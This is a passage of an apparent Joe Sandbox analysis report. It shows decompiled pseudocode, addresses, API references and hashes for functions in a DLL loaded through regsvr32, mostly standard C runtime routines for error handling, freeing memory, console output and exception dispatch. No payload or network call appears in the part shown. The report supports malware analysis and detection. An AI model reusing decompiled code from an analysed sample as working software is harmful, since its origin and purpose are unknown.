							__eflags = _t60;
							if(__eflags != 0) {
								__eflags = E6F6CDF59(__eflags,  *0x6f6dc110, _t60);
								if(__eflags != 0) {
									E6F6CD7BE(_t60, 0x6f6dd850);
									E6F6CDC0E(0);
									_t65 = _t65 + 0xc;
									goto L29;
								} else {
									E6F6CDF59(__eflags,  *0x6f6dc110, _t21);
									_push(_t60);
									goto L25;
								}
							} else {
								E6F6CDF59(__eflags,  *0x6f6dc110, _t20);
								_push(_t60);
								L25:
								E6F6CDC0E();
								_pop(_t43);
								goto L31;
							}
						}
					} else {
						_t60 = E6F6CDF1A(__eflags, _t5);
						__eflags = _t60;
						if(__eflags == 0) {
							_t5 =  *0x6f6dc110; // 0x7
							goto L22;
						} else {
							__eflags = _t60 - 0xffffffff;
							if(_t60 == 0xffffffff) {
								L31:
								E6F6CD547(_t39, _t43, _t49, _t53, _t60);
								asm("int3");
								_push(_t39);
								_push(_t60);
								_push(_t53);
								_t61 = GetLastError();
								_t9 =  *0x6f6dc110; // 0x7
								__eflags = _t9 - 0xffffffff;
								if(__eflags == 0) {
									L38:
									_t10 = E6F6CDF59(__eflags, _t9, 0xffffffff);
									__eflags = _t10;
									if(_t10 == 0) {
										goto L35;
									} else {
										_t54 = E6F6CDC48(1, 0x364);
										__eflags = _t54;
										if(__eflags != 0) {
											__eflags = E6F6CDF59(__eflags,  *0x6f6dc110, _t54);
											if(__eflags != 0) {
												E6F6CD7BE(_t54, 0x6f6dd850);
												E6F6CDC0E(0);
												goto L45;
											} else {
												_t40 = 0;
												E6F6CDF59(__eflags,  *0x6f6dc110, 0);
												_push(_t54);
												goto L41;
											}
										} else {
											_t40 = 0;
											__eflags = 0;
											E6F6CDF59(0,  *0x6f6dc110, 0);
											_push(0);
											L41:
											E6F6CDC0E();
											goto L36;
										}
									}
								} else {
									_t54 = E6F6CDF1A(__eflags, _t9);
									__eflags = _t54;
									if(__eflags == 0) {
										_t9 =  *0x6f6dc110; // 0x7
										goto L38;
									} else {
										__eflags = _t54 - 0xffffffff;
										if(_t54 != 0xffffffff) {
											L45:
											_t40 = _t54;
										} else {
											L35:
											_t40 = 0;
											__eflags = 0;
											L36:
											_t54 = _t40;
										}
									}
								}
								SetLastError(_t61);
								asm("sbb edi, edi");
								_t56 =  ~_t54 & _t40;
								__eflags = _t56;
								return _t56;
							} else {
								L29:
								__eflags = _t60;
								if(_t60 == 0) {
									goto L31;
								} else {
									return _t60;
								}
							}
						}
					}
				} else {
					return _t53;
				}
			}

0x6f6cd9bc
0x6f6cd9bc
0x6f6cd9c7
0x6f6cd9c9
0x6f6cd9ce
0x6f6cd9d1
0x6f6cd9ef
0x6f6cd9f2
0x6f6cd9f7
0x6f6cd9f9
0x00000000
0x6f6cd9fb
0x6f6cda07
0x6f6cda0a
0x6f6cda0b
0x6f6cda0d
0x6f6cda32
0x6f6cda34
0x6f6cda4d
0x6f6cda54
0x6f6cda59
0x00000000
0x6f6cda36
0x6f6cda36
0x6f6cda3f
0x6f6cda44
0x00000000
0x6f6cda44
0x6f6cda0f
0x6f6cda0f
0x6f6cda0f
0x6f6cda18
0x6f6cda1d
0x6f6cda1e
0x6f6cda1e
0x6f6cda23
0x00000000
0x6f6cda23
0x6f6cda0d
0x6f6cd9d3
0x6f6cd9d9
0x6f6cd9dd
0x6f6cd9ea
0x00000000
0x6f6cd9df
0x6f6cd9e2
0x6f6cda5c
0x6f6cda5c
0x6f6cd9e4
0x6f6cd9e4
0x6f6cd9e4
0x6f6cd9e6
0x6f6cd9e6
0x6f6cd9e6
0x6f6cd9e2
0x6f6cd9dd
0x6f6cda5f
0x6f6cda67
0x6f6cda69
0x6f6cda6b
0x6f6cda73
0x6f6cda78
0x6f6cda79
0x6f6cda7e
0x6f6cda7f
0x6f6cda82
0x6f6cda9c
0x6f6cda9f
0x6f6cdaa4
0x6f6cdaa6
0x00000000
0x6f6cdaa8
0x6f6cdab4
0x6f6cdab7
0x6f6cdab8
0x6f6cdaba
0x6f6cdadd
0x6f6cdadf
0x6f6cdaf6
0x6f6cdafd
0x6f6cdb02
0x00000000
0x6f6cdae1
0x6f6cdae8
0x6f6cdaed
0x00000000
0x6f6cdaed
0x6f6cdabc
0x6f6cdac3
0x6f6cdac8
0x6f6cdac9
0x6f6cdac9
0x6f6cdace
0x00000000
0x6f6cdace
0x6f6cdaba
0x6f6cda84
0x6f6cda8a
0x6f6cda8c
0x6f6cda8e
0x6f6cda97
0x00000000
0x6f6cda90
0x6f6cda90
0x6f6cda93
0x6f6cdb0d
0x6f6cdb0d
0x6f6cdb12
0x6f6cdb15
0x6f6cdb16
0x6f6cdb17
0x6f6cdb1e
0x6f6cdb20
0x6f6cdb25
0x6f6cdb28
0x6f6cdb46
0x6f6cdb49
0x6f6cdb4e
0x6f6cdb50
0x00000000
0x6f6cdb52
0x6f6cdb5e
0x6f6cdb62
0x6f6cdb64
0x6f6cdb89
0x6f6cdb8b
0x6f6cdba4
0x6f6cdbab
0x00000000
0x6f6cdb8d
0x6f6cdb8d
0x6f6cdb96
0x6f6cdb9b
0x00000000
0x6f6cdb9b
0x6f6cdb66
0x6f6cdb66
0x6f6cdb66
0x6f6cdb6f
0x6f6cdb74
0x6f6cdb75
0x6f6cdb75
0x00000000
0x6f6cdb7a
0x6f6cdb64
0x6f6cdb2a
0x6f6cdb30
0x6f6cdb32
0x6f6cdb34
0x6f6cdb41
0x00000000
0x6f6cdb36
0x6f6cdb36
0x6f6cdb39
0x6f6cdbb3
0x6f6cdbb3
0x6f6cdb3b
0x6f6cdb3b
0x6f6cdb3b
0x6f6cdb3b
0x6f6cdb3d
0x6f6cdb3d
0x6f6cdb3d
0x6f6cdb39
0x6f6cdb34
0x6f6cdbb6
0x6f6cdbbe
0x6f6cdbc0
0x6f6cdbc0
0x6f6cdbc7
0x6f6cda95
0x6f6cdb05
0x6f6cdb05
0x6f6cdb07
0x00000000
0x6f6cdb09
0x6f6cdb0c
0x6f6cdb0c
0x6f6cdb07
0x6f6cda93
0x6f6cda8e
0x6f6cda6d
0x6f6cda72
0x6f6cda72

APIs

GetLastError.KERNEL32(?,?,?,6F6D0D69,?,00000001,6F6CE2F7,?,6F6D1223,00000001,?,?,?,6F6CE286,?,00000000), ref: 6F6CD9C1
_free.LIBCMT ref: 6F6CDA1E
_free.LIBCMT ref: 6F6CDA54
SetLastError.KERNEL32(00000000,00000007,000000FF,?,6F6D1223,00000001,?,?,?,6F6CE286,?,00000000,00000000,6F6DA968,0000002C,6F6CE2F7), ref: 6F6CDA5F

Memory Dump Source

Source File: 00000019.00000002.665782450.000000006F6C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F6C0000, based on PE: true

Associated: 00000019.00000002.665775734.000000006F6C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000019.00000002.665829052.000000006F6D5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000019.00000002.665868726.000000006F6DC000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000019.00000002.665891961.000000006F6DE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_6f6c0000_regsvr32.jbxd

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: 6928207b4449aad75a43b439fa36be9f9e17a7d997ca2e37f12855f3f7e08175
Instruction ID: a7f07d6d0fdba8f2ca1498f43dd5ed4ff6de09763e13c163112043f40e5b051f
Opcode Fuzzy Hash: 6928207b4449aad75a43b439fa36be9f9e17a7d997ca2e37f12855f3f7e08175
Instruction Fuzzy Hash: E5110C726C8B067BD70116BE8C81E6A326FEBC23BC7110625F2B9971D0EF65DC118557

Uniqueness

Uniqueness Score: -1.00%

Function 6F6CDB13 Relevance: 6.1, APIs: 4, Instructions: 69
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 85%

			E6F6CDB13(void* __ecx) {
				intOrPtr _t2;
				signed int _t3;
				signed int _t13;
				signed int _t18;
				long _t21;

				_t21 = GetLastError();
				_t2 =  *0x6f6dc110; // 0x7
				_t24 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L6:
					_t3 = E6F6CDF59(__eflags, _t2, 0xffffffff);
					__eflags = _t3;
					if(_t3 == 0) {
						goto L3;
					} else {
						_t18 = E6F6CDC48(1, 0x364);
						__eflags = _t18;
						if(__eflags != 0) {
							__eflags = E6F6CDF59(__eflags,  *0x6f6dc110, _t18);
							if(__eflags != 0) {
								E6F6CD7BE(_t18, 0x6f6dd850);
								E6F6CDC0E(0);
								goto L13;
							} else {
								_t13 = 0;
								E6F6CDF59(__eflags,  *0x6f6dc110, 0);
								_push(_t18);
								goto L9;
							}
						} else {
							_t13 = 0;
							__eflags = 0;
							E6F6CDF59(0,  *0x6f6dc110, 0);
							_push(0);
							L9:
							E6F6CDC0E();
							goto L4;
						}
					}
				} else {
					_t18 = E6F6CDF1A(_t24, _t2);
					if(_t18 == 0) {
						_t2 =  *0x6f6dc110; // 0x7
						goto L6;
					} else {
						if(_t18 != 0xffffffff) {
							L13:
							_t13 = _t18;
						} else {
							L3:
							_t13 = 0;
							L4:
							_t18 = _t13;
						}
					}
				}
				SetLastError(_t21);
				asm("sbb edi, edi");
				return  ~_t18 & _t13;
			}

0x6f6cdb1e
0x6f6cdb20
0x6f6cdb25
0x6f6cdb28
0x6f6cdb46
0x6f6cdb49
0x6f6cdb4e
0x6f6cdb50
0x00000000
0x6f6cdb52
0x6f6cdb5e
0x6f6cdb62
0x6f6cdb64
0x6f6cdb89
0x6f6cdb8b
0x6f6cdba4
0x6f6cdbab
0x00000000
0x6f6cdb8d
0x6f6cdb8d
0x6f6cdb96
0x6f6cdb9b
0x00000000
0x6f6cdb9b
0x6f6cdb66
0x6f6cdb66
0x6f6cdb66
0x6f6cdb6f
0x6f6cdb74
0x6f6cdb75
0x6f6cdb75
0x00000000
0x6f6cdb7a
0x6f6cdb64
0x6f6cdb2a
0x6f6cdb30
0x6f6cdb34
0x6f6cdb41
0x00000000
0x6f6cdb36
0x6f6cdb39
0x6f6cdbb3
0x6f6cdbb3
0x6f6cdb3b
0x6f6cdb3b
0x6f6cdb3b
0x6f6cdb3d
0x6f6cdb3d
0x6f6cdb3d
0x6f6cdb39
0x6f6cdb34
0x6f6cdbb6
0x6f6cdbbe
0x6f6cdbc7

APIs

GetLastError.KERNEL32(?,?,?,6F6CD472,6F6D0290,?,6F6CD4C9,?,00000004,?,?,?,?,6F6CCFC7,?,?), ref: 6F6CDB18
_free.LIBCMT ref: 6F6CDB75
_free.LIBCMT ref: 6F6CDBAB
SetLastError.KERNEL32(00000000,00000007,000000FF,?,6F6CD4C9,?,00000004,?,?,?,?,6F6CCFC7,?,?,00000004), ref: 6F6CDBB6

Memory Dump Source

Source File: 00000019.00000002.665782450.000000006F6C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F6C0000, based on PE: true

Associated: 00000019.00000002.665775734.000000006F6C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000019.00000002.665829052.000000006F6D5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000019.00000002.665868726.000000006F6DC000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000019.00000002.665891961.000000006F6DE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_6f6c0000_regsvr32.jbxd

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: 0843915b9a44cc28d04cc32dab0b478d86b4196839438d7c202767ce1e8d9848
Instruction ID: 29e2c9faec798aa523d9b5feee76b820c546b3ce43a74d4bc095f25c14dd5c33
Opcode Fuzzy Hash: 0843915b9a44cc28d04cc32dab0b478d86b4196839438d7c202767ce1e8d9848
Instruction Fuzzy Hash: 1C11C8B26C47057AD701167E4DC1E6A326FEBC32B87210225F2B5972C0EF61DC159527

Uniqueness

Uniqueness Score: -1.00%

Function 6F6D2BEE Relevance: 6.0, APIs: 4, Instructions: 29
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E6F6D2BEE(void* _a4, long _a8, DWORD* _a12) {
				void* _t13;

				_t13 = WriteConsoleW( *0x6f6dc860, _a4, _a8, _a12, 0);
				if(_t13 == 0 && GetLastError() == 6) {
					E6F6D2BD7();
					E6F6D2B99();
					_t13 = WriteConsoleW( *0x6f6dc860, _a4, _a8, _a12, _t13);
				}
				return _t13;
			}

0x6f6d2c0b
0x6f6d2c0f
0x6f6d2c1c
0x6f6d2c21
0x6f6d2c3c
0x6f6d2c3c
0x6f6d2c42

APIs

WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,?,6F6D278A,?,00000001,?,00000001,?,6F6D0CF8,?,?,00000001), ref: 6F6D2C05
GetLastError.KERNEL32(?,6F6D278A,?,00000001,?,00000001,?,6F6D0CF8,?,?,00000001,?,00000001,?,6F6D1244,6F6CE286), ref: 6F6D2C11

Part of subcall function 6F6D2BD7: CloseHandle.KERNEL32(FFFFFFFE,6F6D2C21,?,6F6D278A,?,00000001,?,00000001,?,6F6D0CF8,?,?,00000001,?,00000001), ref: 6F6D2BE7

___initconout.LIBCMT ref: 6F6D2C21

Part of subcall function 6F6D2B99: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6F6D2BC8,6F6D2777,00000001,?,6F6D0CF8,?,?,00000001,?), ref: 6F6D2BAC

WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,6F6D278A,?,00000001,?,00000001,?,6F6D0CF8,?,?,00000001,?), ref: 6F6D2C36

Memory Dump Source

Source File: 00000019.00000002.665782450.000000006F6C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F6C0000, based on PE: true

Associated: 00000019.00000002.665775734.000000006F6C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000019.00000002.665829052.000000006F6D5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000019.00000002.665868726.000000006F6DC000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000019.00000002.665891961.000000006F6DE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_6f6c0000_regsvr32.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: ebdc88f7c8d06d0289fc38ac1e959305b2ba3ac0f09d805a86682d7675ddadc5
Instruction ID: b8d81b541edd2d5f3cd52e1e6714b52db9818db533e6b894c7aecab649f06328
Opcode Fuzzy Hash: ebdc88f7c8d06d0289fc38ac1e959305b2ba3ac0f09d805a86682d7675ddadc5
Instruction Fuzzy Hash: 44F0F236400A1CBBCF122FA68C0898A3F76FF0B6B5B004010FA1999260C7328830AB94

Uniqueness

Uniqueness Score: -1.00%

Function 6F6CD260 Relevance: 6.0, APIs: 4, Instructions: 19
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6F6CD260() {

				E6F6CDC0E( *0x6f6dd844);
				 *0x6f6dd844 = 0;
				E6F6CDC0E( *0x6f6dd848);
				 *0x6f6dd848 = 0;
				E6F6CDC0E( *0x6f6dd9c8);
				 *0x6f6dd9c8 = 0;
				E6F6CDC0E( *0x6f6dd9cc);
				 *0x6f6dd9cc = 0;
				return 1;
			}

0x6f6cd269
0x6f6cd276
0x6f6cd27c
0x6f6cd287
0x6f6cd28d
0x6f6cd298
0x6f6cd29e
0x6f6cd2a6
0x6f6cd2af

APIs

_free.LIBCMT ref: 6F6CD269

Part of subcall function 6F6CDC0E: HeapFree.KERNEL32(00000000,00000000,?,6F6D199E,?,00000000,?,?,?,6F6D19C5,?,00000007,?,?,6F6D04FE,?), ref: 6F6CDC24
Part of subcall function 6F6CDC0E: GetLastError.KERNEL32(?,?,6F6D199E,?,00000000,?,?,?,6F6D19C5,?,00000007,?,?,6F6D04FE,?,?), ref: 6F6CDC36

_free.LIBCMT ref: 6F6CD27C
_free.LIBCMT ref: 6F6CD28D
_free.LIBCMT ref: 6F6CD29E

Memory Dump Source

Source File: 00000019.00000002.665782450.000000006F6C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F6C0000, based on PE: true

Associated: 00000019.00000002.665775734.000000006F6C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000019.00000002.665829052.000000006F6D5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000019.00000002.665868726.000000006F6DC000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000019.00000002.665891961.000000006F6DE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_6f6c0000_regsvr32.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: efa32247597eef4778c305d37527054d74e5a7260c012bf682b30fbcb2100267
Instruction ID: 73a1ad93cbae68079256dcdf25de20644951b9ffaac149deab4fab6010ae5de3
Opcode Fuzzy Hash: efa32247597eef4778c305d37527054d74e5a7260c012bf682b30fbcb2100267
Instruction Fuzzy Hash: D6E0ECF1C82E649A9F137F1B9A004493EBFE78A7783050106E5641A351C7B295739F8A

Uniqueness

Uniqueness Score: -1.00%

Function 6F6CC978 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E6F6CC978(void* __edx, intOrPtr _a4) {
				signed int _v8;
				void* _v12;
				char _v16;
				char* _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				char* _t26;
				intOrPtr* _t36;
				signed int _t37;
				signed int _t40;
				char _t42;
				signed int _t43;
				intOrPtr* _t44;
				intOrPtr* _t45;
				intOrPtr _t48;
				signed int _t49;
				signed int _t54;
				void* _t57;
				intOrPtr* _t58;
				signed int _t64;
				signed int _t66;

				_t57 = __edx;
				_t48 = _a4;
				if(_t48 != 0) {
					__eflags = _t48 - 2;
					if(_t48 == 2) {
						L5:
						E6F6CF8D2(_t48);
						E6F6CF319(_t48, _t57, 0, 0x6f6dd430, 0, 0x6f6dd430, 0x104);
						_t26 =  *0x6f6dd9d0; // 0x3323288
						 *0x6f6dd9c0 = 0x6f6dd430;
						_v20 = _t26;
						__eflags = _t26;
						if(_t26 == 0) {
							L7:
							_t26 = 0x6f6dd430;
							_v20 = 0x6f6dd430;
							L8:
							_v8 = 0;
							_v16 = 0;
							_t64 = E6F6CCC22(E6F6CCAAE( &_v8, _t26, 0, 0,  &_v8,  &_v16), _v8, _v16, 1);
							__eflags = _t64;
							if(__eflags != 0) {
								E6F6CCAAE( &_v8, _v20, _t64, _t64 + _v8 * 4,  &_v8,  &_v16);
								__eflags = _t48 - 1;
								if(_t48 != 1) {
									_v12 = 0;
									_push( &_v12);
									_t49 = E6F6CF20C(_t64, _t64);
									__eflags = _t49;
									if(_t49 == 0) {
										_t58 = _v12;
										_t54 = 0;
										_t36 = _t58;
										__eflags =  *_t58;
										if( *_t58 == 0) {
											L17:
											_t37 = 0;
											 *0x6f6dd9c4 = _t54;
											_v12 = 0;
											_t49 = 0;
											 *0x6f6dd9c8 = _t58;
											L18:
											E6F6CDC0E(_t37);
											_v12 = 0;
											L19:
											E6F6CDC0E(_t64);
											_t40 = _t49;
											L20:
											return _t40;
										} else {
											goto L16;
										}
										do {
											L16:
											_t36 = _t36 + 4;
											_t54 = _t54 + 1;
											__eflags =  *_t36;
										} while ( *_t36 != 0);
										goto L17;
									}
									_t37 = _v12;
									goto L18;
								}
								_t42 = _v8 - 1;
								__eflags = _t42;
								 *0x6f6dd9c4 = _t42;
								_t43 = _t64;
								_t64 = 0;
								 *0x6f6dd9c8 = _t43;
								L12:
								_t49 = 0;
								goto L19;
							}
							_t44 = E6F6CD46D(__eflags);
							_push(0xc);
							_pop(0);
							 *_t44 = 0;
							goto L12;
						}
						__eflags =  *_t26;
						if( *_t26 != 0) {
							goto L8;
						}
						goto L7;
					}
					__eflags = _t48 - 1;
					if(__eflags == 0) {
						goto L5;
					}
					_t45 = E6F6CD46D(__eflags);
					_t66 = 0x16;
					 *_t45 = _t66;
					E6F6CC24F();
					_t40 = _t66;
					goto L20;
				}
				return 0;
			}

0x6f6cc978
0x6f6cc981
0x6f6cc986
0x6f6cc990
0x6f6cc993
0x6f6cc9b0
0x6f6cc9b1
0x6f6cc9c4
0x6f6cc9c9
0x6f6cc9d1
0x6f6cc9d7
0x6f6cc9da
0x6f6cc9dc
0x6f6cc9e3
0x6f6cc9e3
0x6f6cc9e5
0x6f6cc9e8
0x6f6cc9eb
0x6f6cc9f2
0x6f6cca0b
0x6f6cca10
0x6f6cca12
0x6f6cca33
0x6f6cca3b
0x6f6cca3e
0x6f6cca59
0x6f6cca5c
0x6f6cca63
0x6f6cca67
0x6f6cca69
0x6f6cca70
0x6f6cca73
0x6f6cca75
0x6f6cca77
0x6f6cca79
0x6f6cca83
0x6f6cca83
0x6f6cca85
0x6f6cca8b
0x6f6cca8e
0x6f6cca90
0x6f6cca96
0x6f6cca97
0x6f6cca9d
0x6f6ccaa0
0x6f6ccaa1
0x6f6ccaa7
0x6f6ccaaa
0x00000000
0x00000000
0x00000000
0x00000000
0x6f6cca7b
0x6f6cca7b
0x6f6cca7b
0x6f6cca7e
0x6f6cca7f
0x6f6cca7f
0x00000000
0x6f6cca7b
0x6f6cca6b
0x00000000
0x6f6cca6b
0x6f6cca43
0x6f6cca43
0x6f6cca44
0x6f6cca49
0x6f6cca4b
0x6f6cca4d
0x6f6cca52
0x6f6cca52
0x00000000
0x6f6cca52
0x6f6cca14
0x6f6cca19
0x6f6cca1b
0x6f6cca1c
0x00000000
0x6f6cca1c
0x6f6cc9de
0x6f6cc9e1
0x00000000
0x00000000
0x00000000
0x6f6cc9e1
0x6f6cc995
0x6f6cc998
0x00000000
0x00000000
0x6f6cc99a
0x6f6cc9a1
0x6f6cc9a2
0x6f6cc9a4
0x6f6cc9a9
0x00000000
0x6f6cc9a9
0x00000000

Strings

C:\Windows\SysWOW64\regsvr32.exe, xrefs: 6F6CC9BB, 6F6CC9F8

Memory Dump Source

Source File: 00000019.00000002.665782450.000000006F6C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F6C0000, based on PE: true

Associated: 00000019.00000002.665775734.000000006F6C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000019.00000002.665829052.000000006F6D5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000019.00000002.665868726.000000006F6DC000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000019.00000002.665891961.000000006F6DE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_6f6c0000_regsvr32.jbxd

Similarity

API ID:
String ID: C:\Windows\SysWOW64\regsvr32.exe
API String ID: 0-3922119987
Opcode ID: 90ea76be24dde55ca80558b4d360d29969fafd66f6981fc8b42c2c43cfbe273b
Instruction ID: 4bbc58f3a3c5a2a46013998848afa54497390159192df3fe1e48a3955ab5f73d
Opcode Fuzzy Hash: 90ea76be24dde55ca80558b4d360d29969fafd66f6981fc8b42c2c43cfbe273b
Instruction Fuzzy Hash: 6341DFB1E40294AFCB11DFEDD98499EBBF9FF85314F004066E486DB240D771AA41CB96

Uniqueness

Uniqueness Score: -1.00%

Function 6F6CB475 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 64%

			E6F6CB475(void* __ecx, void* __edx, signed char* _a4, signed char* _a8, intOrPtr _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
				signed int _v8;
				signed int _v12;
				intOrPtr* _v16;
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				signed int _v36;
				void* _v40;
				intOrPtr _v44;
				signed int _v48;
				intOrPtr _v56;
				void _v60;
				signed char* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t74;
				void* _t75;
				char _t76;
				signed char _t78;
				signed int _t80;
				signed char* _t81;
				signed int _t82;
				signed int _t83;
				intOrPtr* _t87;
				void* _t90;
				signed char* _t93;
				intOrPtr* _t96;
				signed char _t97;
				intOrPtr _t98;
				intOrPtr _t99;
				intOrPtr* _t101;
				signed int _t102;
				signed int _t103;
				signed char _t108;
				signed char* _t111;
				signed int _t112;
				void* _t113;
				signed char* _t116;
				void* _t121;
				signed int _t123;
				void* _t130;
				void* _t131;

				_t110 = __edx;
				_t100 = __ecx;
				_t96 = _a4;
				if( *_t96 == 0x80000003) {
					return _t74;
				} else {
					_push(_t121);
					_push(_t113);
					_t75 = E6F6CAD86(_t96, __ecx, __edx, _t113, _t121);
					if( *((intOrPtr*)(_t75 + 8)) != 0) {
						__imp__EncodePointer(0);
						_t121 = _t75;
						if( *((intOrPtr*)(E6F6CAD86(_t96, __ecx, __edx, 0, _t121) + 8)) != _t121 &&  *_t96 != 0xe0434f4d &&  *_t96 != 0xe0434352) {
							_t87 = E6F6CA645(__edx, 0, _t121, _t96, _a8, _a12, _a16, _a20, _a28, _a32);
							_t130 = _t130 + 0x1c;
							if(_t87 != 0) {
								L16:
								return _t87;
							}
						}
					}
					_t76 = _a20;
					_v24 = _t76;
					_v20 = 0;
					if( *((intOrPtr*)(_t76 + 0xc)) > 0) {
						_push(_a28);
						E6F6CA578(_t96, _t100, 0, _t121,  &_v40,  &_v24, _a24, _a16, _t76);
						_t112 = _v36;
						_t131 = _t130 + 0x18;
						_t87 = _v40;
						_v16 = _t87;
						_v8 = _t112;
						if(_t112 < _v28) {
							_t102 = _t112 * 0x14;
							_v12 = _t102;
							do {
								_t103 = 5;
								_t90 = memcpy( &_v60,  *((intOrPtr*)( *_t87 + 0x10)) + _t102, _t103 << 2);
								_t131 = _t131 + 0xc;
								if(_v60 <= _t90 && _t90 <= _v56) {
									_t93 = _v44 + 0xfffffff0 + (_v48 << 4);
									_t108 = _t93[4];
									if(_t108 == 0 ||  *((char*)(_t108 + 8)) == 0) {
										if(( *_t93 & 0x00000040) == 0) {
											_push(0);
											_push(1);
											E6F6CB04B(_t112, _t96, _a8, _a12, _a16, _a20, _t93, 0,  &_v60, _a28, _a32);
											_t112 = _v8;
											_t131 = _t131 + 0x30;
										}
									}
								}
								_t112 = _t112 + 1;
								_t87 = _v16;
								_t102 = _v12 + 0x14;
								_v8 = _t112;
								_v12 = _t102;
							} while (_t112 < _v28);
						}
						goto L16;
					}
					E6F6CD547(_t96, _t100, _t110, 0, _t121);
					asm("int3");
					_t111 = _v68;
					_push(_t96);
					_push(_t121);
					_push(0);
					_t78 = _t111[4];
					if(_t78 == 0) {
						L41:
						_t80 = 1;
					} else {
						_t101 = _t78 + 8;
						if( *_t101 == 0) {
							goto L41;
						} else {
							_t116 = _a4;
							if(( *_t111 & 0x00000080) == 0 || ( *_t116 & 0x00000010) == 0) {
								_t97 = _t116[4];
								_t123 = 0;
								if(_t78 == _t97) {
									L33:
									if(( *_t116 & 0x00000002) == 0 || ( *_t111 & 0x00000008) != 0) {
										_t81 = _a8;
										if(( *_t81 & 0x00000001) == 0 || ( *_t111 & 0x00000001) != 0) {
											if(( *_t81 & 0x00000002) == 0 || ( *_t111 & 0x00000002) != 0) {
												_t123 = 1;
											}
										}
									}
									_t80 = _t123;
								} else {
									_t59 = _t97 + 8; // 0x6e
									_t82 = _t59;
									while(1) {
										_t98 =  *_t101;
										if(_t98 !=  *_t82) {
											break;
										}
										if(_t98 == 0) {
											L29:
											_t83 = _t123;
										} else {
											_t99 =  *((intOrPtr*)(_t101 + 1));
											if(_t99 !=  *((intOrPtr*)(_t82 + 1))) {
												break;
											} else {
												_t101 = _t101 + 2;
												_t82 = _t82 + 2;
												if(_t99 != 0) {
													continue;
												} else {
													goto L29;
												}
											}
										}
										L31:
										if(_t83 == 0) {
											goto L33;
										} else {
											_t80 = 0;
										}
										goto L42;
									}
									asm("sbb eax, eax");
									_t83 = _t82 | 0x00000001;
									goto L31;
								}
							} else {
								goto L41;
							}
						}
					}
					L42:
					return _t80;
				}
			}

0x6f6cb475
0x6f6cb475
0x6f6cb47c
0x6f6cb485
0x6f6cb5a4
0x6f6cb48b
0x6f6cb48b
0x6f6cb48c
0x6f6cb48d
0x6f6cb497
0x6f6cb49a
0x6f6cb4a0
0x6f6cb4aa
0x6f6cb4cf
0x6f6cb4d4
0x6f6cb4d9
0x6f6cb5a0
0x00000000
0x6f6cb5a1
0x6f6cb4d9
0x6f6cb4aa
0x6f6cb4df
0x6f6cb4e2
0x6f6cb4e5
0x6f6cb4eb
0x6f6cb4f1
0x6f6cb503
0x6f6cb508
0x6f6cb50b
0x6f6cb50e
0x6f6cb511
0x6f6cb514
0x6f6cb51a
0x6f6cb520
0x6f6cb523
0x6f6cb526
0x6f6cb535
0x6f6cb536
0x6f6cb536
0x6f6cb53b
0x6f6cb54e
0x6f6cb550
0x6f6cb555
0x6f6cb560
0x6f6cb562
0x6f6cb564
0x6f6cb580
0x6f6cb585
0x6f6cb588
0x6f6cb588
0x6f6cb560
0x6f6cb555
0x6f6cb58e
0x6f6cb58f
0x6f6cb592
0x6f6cb595
0x6f6cb598
0x6f6cb59b
0x6f6cb526
0x00000000
0x6f6cb51a
0x6f6cb5a5
0x6f6cb5aa
0x6f6cb5ae
0x6f6cb5b1
0x6f6cb5b2
0x6f6cb5b3
0x6f6cb5b4
0x6f6cb5b9
0x6f6cb631
0x6f6cb633
0x6f6cb5bb
0x6f6cb5bb
0x6f6cb5c1
0x00000000
0x6f6cb5c3
0x6f6cb5c6
0x6f6cb5c9
0x6f6cb5d0
0x6f6cb5d3
0x6f6cb5d7
0x6f6cb609
